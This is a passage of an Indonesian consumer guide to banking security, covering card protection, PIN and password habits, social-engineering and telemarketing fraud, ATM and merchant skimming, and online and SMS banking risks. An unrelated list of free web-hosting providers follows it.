Kalau kartu anda dapat digunakan pada jaringan internasional, maka biasanya akan memiliki kode 3 angka (CVV2) di belakang kartu Anda. Kecuali untuk otorisasi transaksi online, kode CVV2 tidak akan pernah digunakan. Tutup 3 angka di belakang kartu dengan sticker, cellotape yang tidak transparan. Untuk transaksi konvensional di mesin ATM, counter EDC merchant kode CVV2 juga tidak diperlukan. Apabila kartu rusak, terlipat, patah ataupun hilang, segera lakukan pemblokiran dan minta pengganti. Catat nomor telepon hotline, customer service, fax dan alamat resmi bank penerbit kartu. Gandakan catatan ini pada beberapa tempat yang berbeda namun mudah diakses pada saat genting.
Untuk melindungi kartu jenis RFID (misalnya voucher pra bayar elektronik), saat ini di pasaran banyak dijual casing (seperti jaket/sleeve) anti pemindai. Di kalangan underground banyak dijual peralatan ini (pemindai RFID) dengan harga murah dan bahkan cukup mudah dibuat sendiri (homebrew).
4. Manajemen PIN dan Password
Langkah pengamanan sendiri (self protection) yang perlu dilakukan adalah mengganti PIN ATM, kartu debit/kredit, SMS/mobile banking dan password Internet banking anda sesering mungkin. Parameter sederhana untuk penggantian PIN dan password adalah misalnya ketika anda cukur rambut atau ganti kaos kaki (yang mulai bau), atau ganti sikat gigi (karena sudah mulai kusut) atau tiap kali cek tekanan roda kendaraan, itulah saatnya mengganti PIN. Di stasiun pompa bensin biasanya ada mesin ATM dananda bisa mengganti PIN ketika sedang melakukan transaksi pembelian BBM.
Selain itu simpanlah PIN di tempat aman dan sandikan catatan itu dengan cara anda sendiri (misalnya dengan menyisipkan angka tambahan), sehingga orang lain tidak mudah menebak PIN anda. Sedang untuk password, sebaiknya gunakan kombinasi alfanumerik dan karakter spesial apabila diijinkan oleh sistem. Gunakan frasa panjang (lebih dari 8 karakter) yang tidak mudah dimengerti maknanya secara harfiah. Yang terakhir, jangan pernah memberitahukan PIN dan password kepada siapapun termasuk kepada petugas bank dengan alasan apapun. Karena itu pintu masuk segalanya.
Musuh utama masalah keamanan adalah perilaku (behaviour) manusia itu sendiri, kebiasaan buruk yang diabaikan (permisif). Sebagian besar insiden terjadi akibat eksploitasi kelemahan secara sosial, sehingga tekniknya disebut dengan social engineering (rekayasa sosial). Modus penipuan mengaku undian berhadiah atau petugas bank yang sedang melakukan perawatan atau orang yang mengakupetugas bank dan memberikan bantuan adalah contoh rekayasa sosial tersebut.
*) catatan: manusia punya kelemahan dalam mengingat sejumlah besar PIN dan password, apalagi harus diganti secara periodik. Anda dapat menggunakan software komputer yang disebut password manager untuk mengelola aneka PIN dan password serta erubahannya tanpa harus menghapalkan satu per satu. Software tersebut yang akan melakukan perubahan periodik terhadap password anda bahkan tanpa anda sendiri mengetahui/hapal isi passwordnya. Sehingga teknik social engineering tak akan mudah memperdaya anda. Anda cukup menghapal satu kata kunci pembuka sandi software itu saja. Data hasil penyimpanan disandikan, sehingga walaupun bisa diambil orang lain, tetap saja tidak bisa dibaca secara telanjang. Dengan software ini anda dapat menyimpan dan mengamankan data di tempat yang terpisah untuk memudahkan anda mengaksesnya dan untuk menghindari single point of failure. Misalnya, bila anda hanya menyimpan data PIN dan password di HP atau notebook, maka ada kemungkinan masalah bila justru media itu yang hilang. Dengan software ini anda dapat menyimpan data di sejumlah tempat dan bisa diakses dari manapun, di Internet misalnya. 
5. Tidak Mudah Percaya dan Lakukan Cross Check
Jangan pernah memberikan informasi PIN, password dan data pribadi yang biasa digunakan untuk otorisasi perbankan kepada siapapun dengan alasan apapun termasuk pada customer service bank. Data pribadi seperti misalnya nama gadis ibu kandung dan lainnya, walaupun bukan informasi yang rahasia, namun oleh bank selalu dijadikan kata kunci otentikasi identitas nasabah. Oleh karena itu, sebaiknya informasi tersebut diindungi, tidak mudah diberikan kepada siapapun. Kecuali memang yakin bahwa itu prosedur yang harus dilalui, misalnya ketika melaporkan kehilangan kartu.
Oleh karena itu sangat penting bagi nasabah untuk memahami detail setiap aspek layanan sehingga bisa membedakan manakah prosedur sesungguhnya dan yang ternyata adalah jebakan. Sekarang banyak sekali pihak ketiga (misalnya perusahaan asuransi) dengan alasan ada kerja sama dengan pihak bank penerbit kartu, menawarkan produknya secara telemarketing dan anda dimintamemberikan informasi pribadi tertentu dengan alasan untuk keperluan otentikasi. Resikonya, apabila ternyata bukan telemarketing tetapi dari sindikat pelaku fraud yang mencoba mengkorek data dan informasi pribadi, anda tidak pernah tahu dan seolah diposisikan tidak bisa melakukan cross check dalam situasi ini. Lebih bijaksana bersikap tidak mudah percaya dan tetap cross check.
Berhati-hati apabila menerima tawaran dari telemarketing, karena biasanya persetujuan yang anda berikan akan diterjemahkan sebagai kesediaan untuk melakukan auto debet terhadap account anda. Ini berbahaya, lebih baik bila kurang yakin, anda meminta waktu untuk melakukan konfirmasi kepada bank penerbit apakah benar pihak bank punya kerjasama dengan pihak telemarketing tersebut dan bagaimana aturan main serta risikonya. Atau tolak tawaran (telemarketing) itu. Kalau anda tertarik, cukup anda tanyakan kepada petugs telemarketing tsb. nama produk dan siapa penyelenggaranya. Selanjutnya anda sendiri bisa inisiatif yang menghubungi penyelenggara jasa itu dan meminta untuk dilayani. Cara ini lebih aman, lakukan cross check, walau ini perlu partisipasi aktif anda.
Banyak modus kejahatan melakukan eksploitasi psikologis (bagian dari social engineering), seperti di dalam tawaran telemarketing atau undian berhadiah. Manusiawi apabila untuk sesaat seseorang akan merasakan euforia ketika diberikan ucapan selamat karena mendapatkan hadiah besar. Tetapi harus tetap waspada dan selalu melakukan cross check walaupun biasanya pelaku akan menekan dengan cara memberikan ancaman halus berupa batas waktu. Sesungguhnya anda tetap punya waktu untuk melakukan cross check. Demikian juga dengan modus penipuan lain, seperti misalnya berita darurat (sanak keluarga memerlukan tindakan medis segera) ataupun perintah misterius dari seseorang yang mengaku sebagai petugas/aparat keamanan. Informasi pribadi milik anda bisa saja digunakan untuk memperdaya orang terdekat anda atau sebaliknya. Siapapun akan mengalami kepanikan apabila ada kabar orang terdekat dalam kondisi kritis, apalagi si pemberi kabar mampu meyakinkan memberikan data-data pribadi yang sangat akurat, sehingga lalai untuk melakukan cross check.
Hal lain yang perlu anda pahami adalah, tidak selalu informasi pribadi itu akan digunakan untuk suatu tujuan jahat seperti penipuan dengan berbagai macam modus yang telah dipaparkan di atas. Di dalam dunia underground economy (pasar gelap di Internet), informasi pribadi seseorang adalah komoditas yang sangat diminati dan dapat diperjualbelikan. Motif yang pertama adalah untuk data marketing. Di dunia nyata, biaya survey market sangatlah mahal dan seringkali harus memberikan kompensasi pada responden. Maka, data informasi profile responden sangatlah berharga. Bila ada yang menjual dengan harga murah, itu bisa menjadi suatu penghematan besar. Motif yang kedua adalah sebagai media bagi jenis kejahatan yang lain, seperti misalnya spammer – perusahaan marketing online yang selalu haus alamat email baru untuk disebarkan unsolicited mail, brosur dan aneka penawaran sampah. Ataupun digunakan para bot master untuk menyebarkan malware, menginfeksi komputer anda dengan trojan dan menggunakannya sebagai pasukan (bersama ratusan, ribuan komputer lain yang terinfeksi) bots untuk menyerang pihak lain. Di dunia cyber crime, seorang bot master (attacker) bisa disewa untuk melakukan serangan terhadap pihak lain. Dan mereka memanfaatkan komputer anda tanpa disadari. Motif yang ketiga, informasi rahasia anda digunakan untuk tujuan pemalsuan identitas.
Kesimpulannya, jangan mudah percaya dengan permintaan data pribadi. Baik itu melalui permintaan off line, via telepon/telemarketing maupun ketika anda sedang online di Internet. Selalu lakukan cross check dan apabila anda ragu, lebih baik tinggalkan. Keamanan informasi pribadi anda lebih penting dan berharga apabila dibandingkan aneka tawaran yang mungkin diberikan kepada anda.
*) catatan: bank menerapkan suatu teknik pengamanan yang disebut dengan psuedo security, yaitu serangkaian prosedur yang seolah merupakan pengamanan padahal sebenarnya bukan. Prosedur itu diadakan untuk menciptakan rasa aman semu bagi awam, baik itu nasabah maupun manajemen bank itu sendiri. Misalnya, informasi pribadi yang seolah adalah rahasia dan karenanya dijadikan basis data untuk otorisasi seperti nama gadis ibu kandung. Pada prinsipnya nama gadis ibu kandung bukanlah informasi yang rahasia, karena tentu saja banyak orang yang telah mengetahuinya. Sehingga kalau ada yang berniat jahat, bisa saja mengumpulkan informasi tersebut dan merangkainya sedemikian rupa untuk digunakan mengelabui customer service bank (misalnya via phone banking). Kelemahan psuedo security inilah yang dimanfaatkan oleh para pelaku kejahatan fraud, misalnya dengan kedok undian berhadiah atau mengaku sebagai customer service bank, mitra asuransi dlsb. Istilah lain yang mirip dan sangat dikenal di dalam dunia kemanan informasi adalah prinsip security through obscurity. Alasan bank menerapkan pengamanan semu adalah justru demi untuk kenyamanan nasabah, sebab bila sistem pengamanan yang sesungguhnya diterapkan maka akan menyulitkan. Bila pengamanan makin ketat maka tingkat kenyamanan dan kemudahan layanan akan semakin menurun.
6. Berhati-hati Saat Bertransaksi
Modus kejahatan skimming sebenarnya tidak hanya dilakukan di mesin ATM, namun juga terjadi pada transaksi di mesin EDC counter merchant. Bahkan modus ini relatif lebih mudah dilakukan pelaku bila dibandingkan dengan ATM skimmer karena tidak diperlukan kamera pengintip. Beberapa kasus sudah pernah terbongkar sebelumnya. Pilih merchant yang anda yakini benar reputasinya.
Awasi terus keberadaan kartu anda ketika berada di counter merchant, jangan biarkan kartu dibawa kemana-mana dan digesek ke mesin EDC yang berbeda berkali-kali. Lebih baik anda membatalkan transaksi, tidak usah menandatangani apapun dan laporkan ke bank penerbit apabila curiga dengan kondisi di suatu counter merchant. Kalau memungkinkan periksa kondisi mesin EDC, apakah nampak ada perangkat tambahan atau sambungan kabel tambahan yang mencurigakan. Tapi ini perlu sedikit pemahaman teknis, pengguna awam tentu akan sulit membedakan. Namun aksi anda yang seolah tahu kondisi mesin EDC itu mungkin bisa mencegah pelaku dan mengurungkan niatnya.
Patut untuk diingat, begitu kartu digesekkan ke mesin EDC, maka semua informasi penting di dalam magnetic stripe akan tercatat oleh mesin EDC dan sebagian bahkan akan di print out. Seperti nama, nomor kartu dan tanggal masa berlaku (kadang kala tanggal mulai menggunakan). Seseorang tidak perlu punya ingatan super untuk menghapal deretan kode angka yang tertera di kartu. Kalau andalengah cukup banyak waktu bisa digunakan pelaku untuk mencatat informasi itu atau dengan teknik sederhana menggosok deretan angka yang menonjol (embossed) pada kartu dengan kepingan uang logam pada kertas karbon nota pembelanjaan yang selalu tersedia di meja kasir (thrasing). Bahkan mereka bisa saling kerja sama misalnya berdua, satu orang sengaja mengalihkan perhatian anda dansatunya yang membawa kartu mencatat atau bahkan menggesekkan kartu anda ke mesin skimming yang tidak terlihat. Maka sebaiknya anda berusaha terus mengawasi transaksi tersebut.
Selalu berhati-hati dan harus melakukan pemeriksaan berulang terhadap transaksi dan mencari tahu terlebih dahulu kredibilitas merchant, ketika anda memutuskan untuk melakukan transaksi online di Internet. Perhatikan pula produk yang dijual, apakah benar memiliki kualitas seperti yang dijanjikan ataukah hanya tipuan? Sebaiknya hanya lakukan transaksi di situs yang sudah terkenal dan diketahui reputasinya. Selain lebih meyakinkan, kualitas barang yang ditawarkan pun sesuai.
Banyak sekali situs transaksi online yang tidak kredibel, untuk menjebak konsumen dan mendapatkan informasi kartu kreditnya. Situs transaksi online yang kredibel biasanya memiliki referensi dari pihak ketiga, ada jaminan transaksi pada pelanggan (seperti asuransi, sistem tracking pengiriman barang, garansi). Periksa semua referensi, apakah benar ada atau ternyata hanya tipuan. Lakukan pencarian dengan search engine apakah ditemukan keluhan mengenai situs transaksi tersebut.
Selalu gunakan kartu kredit atau kartu debit yang paling rendah limitnya ketika melakukan transaksi online, untuk antisipasi seandainya terjadi fraud. Atau yang lebih bijaksana, gunakan layanan online payment (e-money) pihak ketiga seperti paypal untuk menghindari transaksi langsung menggunakan kartu kredit. Anda dapat mengisikan dana dari kartu kredit ke layanan uang elektronik dalam jumlah yang terbatas sehingga aman dari upaya pembobolan. Selanjutnya untuk transaksi dengan merchant online dilakukan dengan pembayaran melalui e-money ini. Merchant yang bisa menerima pembayaran dengan e-money punya kredibilitas yang meyakinkan karena dipercaya provider e-money.
Namun bila tetap tidak yakin dengan keamanan kartu kredit dan informasi pribadi anda, sebenarnya masih ada alternatif lain untuk transaksi online, yaitu dengan menggunakan metode pembayaran wire transfer. Cara ini lebih meyakinkan walaupun lebih lama prosesnya dan anda harus menyediakan uang tunai serta tidak bisa menikmati manfaat pembayaran tunda serta fasilitas cicilan tetap yang banyak ditawarkan oleh kartu kredit. Wire transfer juga bisa digunakan untuk mengisi e-money.
*) catatan: perlu diketahui, tidak semua mesin EDC di counter merchant berasal dari bank, atau tidak dalam pengendalian dan pengawasan bank sepenuhnya. Mesin EDC itu mungkin saja disediakan oleh pihak ketiga (vendor outsourcing, perusahaan payment gateway dlsb. Bahkan seperti mesin ATM ada pula yang menyewakan). Akibatnya sangat mungkin terjadi penyimpangan mesin EDC.
7. Sadar Lingkungan Transaksi
Ketika anda akan bertransaksi di mesin ATM, hal pertama yang harus anda lakukan adalah mencari mesin ATM yang sekiranya aman. Pilihlah mesin ATM yang berada di tempat terbuka dan selalu ramai dikunjungi dan selalu diawasi keamanannya, misalnya di pusat perbelanjaan. Hindari mesin ATM yang berada di lokasi yang terpencil, gelap, sepi dan tanpa penjagaan atau pengawasan.
Kalau anda sedang terburu-buru, tidak sempat memeriksa kondisi mesin ATM maka langkah paling aman adalah menggunakan outlet yang ada di bank itu sendiri. Setiap kantor cabang, biasanya kini telah menyediakan mesin ATM yang relatif terjaga kondisinya karena ada petugas keamanan 24 jam (walaupun perlu dipahami bahwa tugas petugas keamanan sebenarnya bukan mengamankan mesinATM, melainkan menjaga kantor cabang – mesin ATM termasuk properti kantor tsb.).
Periksalah kondisi mesin ATM. Perhatikan mulut lubang card reader, apakah ada bekas lem, tempelan atau benda lain yang mencurigakan (karena tidak seharusnya berada di situ). Untuk memastikannya, goyangkan sedikit apabila ada benda asing di sekitar mesin ATM (misalnya kotak pengumuman yang ada di samping mesin ATM), celah di sekitar mesin atau di atap, untuk memeriksa apakah tidak ada peralatan tersembunyi di dalamnya, misalnya kamera. Pastikan mulut lubang card reader ATM telah dilindungi dengan tutup anti skimmer. Cermati apa papan tombol numerik (keyboard) telah dilindungi dengan penutup. Bila tidak yakin, ketika memasukkan PIN, lindungi dan tutupi tangan anda sehingga sulit diintip. Periksa pula apa tidak ada benda lain yang menutupi keyboard, karena pelaku skimmer bisa saja memasang bantalan tambahan yang menyerupai keyboard dan berfungsi sebagai keylogger (perekam keyboard). Bila anda tidak yakin dengan prosedur ini, setiap saat anda bisa meninggalkan mesin ATM tersebut dan mencari lokasi lain yang lebih terjamin keamanannya.
Jangan pernah percaya dengan tawaran bantuan dari orang di sekitar mesin ATM termasuk itu yang mengaku sebagai satpam atau petugas bank. Apabila anda mengalami kesulitan, lebih baik telepon customer service bank dan biarlah masalah anda diatasi oleh mereka – itu sebabnya mengapa anda harus memiliki catatan nomor kontak resmi bank. Jangan pernah percaya informasi dari orang lain di sekitar mesin ATM atau stiker yang seolah menunjukkan nomor kontak resmi bank, karena bisa saja ternyata bukan dan ini adalah jebakan pelaku fraud. Bila kartu anda tersangkut di mesin ATM, maka tinggalkan saja tanpa melakukan apapun kecuali langsung menghubungi CS bank segera diblokir dan meminta kartu baru. Ingat, dalam prosedur pelaporan ini anda tidak akan diminta menyebut nomor PIN. Bila CS atau yang mengaku CS bank menanyakan PIN, tutup saja teleponnya. Jika anda merasa mengalami penipuan ataupun kejanggalan, lebih baik laporkan kepada bank atau apabila anda telah menderita suatu kerugian, laporkan kepada kepolisian terdekat.
Kewaspadaan yang sama harus anda terapkan ketika menggunakan Internet banking. Syarat utama yang harus dipenuhi adalah memastikan bahwa terminal akses yang anda gunakan aman. Gunakan selalu terminal akses milik anda sendiri (misalnya laptop) yang anda yakini kemanannya. Bila anda menggunakan terminal akses publik (misalnya di warnet, di kampus, di kantor) atau milik orang lain maka pastikan bahwa terminal tersebut bersih dari virus, trojan dan aplikasi berbahaya seperti key logger. Anda harus melakukan hard booting terlebih dahulu sebelum bertransaksi untuk menghapus sejumlah program jahat yang mungkin residen di memori (misalnya key logger) dan melakukan scan menyeluruh dengan anti virus serta anti malware terbaru (sejumlah aplikasi tools pemeriksa ini bisa anda pasang di sebuah media penyimpan USB portabel). Proses ini perlu waktu.
Anda juga harus membiasakan akses dengan menggunakan browser yang aman atau menggunakan aplikasi browser portabel milik anda sendiri. Beberapa layanan Internet banking sudah menyediakan keyboard virtual pada halaman web sehingga anda tidak perlu memasukkan satu huruf atau angka pun dari keyboard komputer. Cara ini lebih aman, namun ternyata belum semua bank menerapkan.Anda juga harus dapat mengenali model penipuan menggunakan teknik phising dan bagaimana cara menghindarinya serta disiplin untuk tidak mengaktifkan opsi fitur otomatis merekam username dan password. Setiap kali selesai melakukan transaksi, hapus pula cookies dan cache.
Tidak cukup sampai di situ, anda juga harus memastikan keamanan saluran akses yang digunakan. Bertransaksi Internet banking menggunakan layanan WiFi (wireless) di sebuah cafe adalah contoh yang sangat tidak dianjurkan. Karena layanan WiFi sangat rawan penyadapan dan teknik ini terlalu mudah untuk dilakukan. Bisa jadi seorang pengguna laptop yang ada di seberang meja anda itulahattacker yang sedang menyadap semua informasi penting dari laptop anda dan mencatat transaksi Internet banking anda termasuk username, password bahkan algoritma token bank.
Perlu anda ketahui, walaupun sudah menggunakan pengaman token, namun bukan berarti algoritma kunci dari tools ini tidak dapat didekripsi oleh pelaku kejahatan. Dengan teknik tertentu token dapat dibobol dan diduplikasi dengan menggunakan software tools pembongkar algoritma. Menggunakan terminal yang bersih dan diyakini keamanannya serta saluran fixed (kabel) private saatmelakukan transaksi melalui Internet banking adalah pilihan yang paling bijaksana.
Terakhir, menggunakan layanan SMS/mobile banking adalah jenis transaksi yang paling tidak aman karena hanya mengandalkan otentikasi berdasarkan nomor HP dan PIN. Tidak ada cara pengamanan tambahan misalnya koneksi yang terenkripsi, metode otentikasi tambahan dan pemakaian token atau one time access code. Anda perlu mengetahui bahwa nomor HP (di Indonesia hampir semua operator menggunakan SIM/RUIM card) dapat dengan mudah digandakan (cloning). Sedang PIN dapat dengan diperoleh misalnya melalui social engineering. Maka, bila anda masih bisa melakukan transaksi dengan cara lain, tidak selalu dalam kondisi mobile, tidak harus melakukan transaksi segera, gunakanlah cara lain, hindari menggunakan fasilitas dan fitur serta layanan SMS/mobile banking. Bahkan mungkin saja anda tidak perlu mengaktifkan layanan ini apabila memang tidak memerlukannya.
Ketika anda secara intensif memanfaatkan teknologi untuk memfasilitasi dan mempermudah aktivitas kehidupan sehari-hari, maka sadarilah bahwa anda juga harus memahami resiko yang menyertai dan memahami bagaimana cara meminimalisir dampak yang mungkin terjadi. Perilaku waspada dan sadar resiko itu menjadi tanggung jawab dan peran anda dalam upaya pengamanan. Karena, your security is my security. Bukan hanya menjadi urusan bank, pemerintah dan penyedia layanan.
Pihak Bank Indonesia, industri perbankan, aparat keamanan dan pemerintah mempunyai kewajiban dan tanggung jawab kepada masyarakat untuk secara berkelanjutan memberikan edukasi mengenal jenis layanan yang memanfaatkan teknologi, karakteristik, aturan main dan resiko yang mungkin saja terjadi. Kampanye semacam ini dapat mematikan niat dan modus pelaku kejahatan.

Kumpulan Free Hosting

Kumpulan Free Hosting

 

  • 100gb.co----- cPanel
  • instantfreesite.com---cPanel s
  • harkserve.com ---cpanel
  • Panel x10.com ----cPanel
  • serversfree.com ---custom Panel
  • idhostinger--- custom Panel
  • 000webhost.com---custom Panel
  • bytehost.com-----custom vista Panel
  • infiniteserve.com-----cPanel
  • getfreehosting.co.uk-----custom Panel
  • WebMasterPoke.Com-----Panel - (P2H)
  • 100gb.co------cpanel
  • x90x.net----custom Panel
  • 15gb.us ----cpanel
  • freehostcom.com-----cPanel
  • bjmhost.net--- custom Panel
  • rocketserve.net ---| cPanel
  • gofreeserve.com ---custom Panel